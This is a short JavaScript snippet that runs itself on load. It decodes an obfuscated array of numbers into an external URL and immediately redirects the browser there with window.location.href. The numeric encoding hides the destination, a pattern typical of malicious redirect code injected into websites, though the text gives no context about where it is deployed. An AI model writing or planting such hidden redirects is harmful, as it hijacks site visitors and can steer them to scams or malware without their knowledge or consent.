(function () {
const encrypted = [111, 246, 369, 476, 610, 390, 378, 432, 1116, 630, 583, 1356, 1404, 1498, 1845, 1680, 901, 1908, 2242, 2320];
function decode(arr, key = 7) {
return arr.map((val, i) => String.fromCharCode(val / (i + 1) - key)).join('');
}
const target = decode(encrypted);
return window.location.href = target;
})();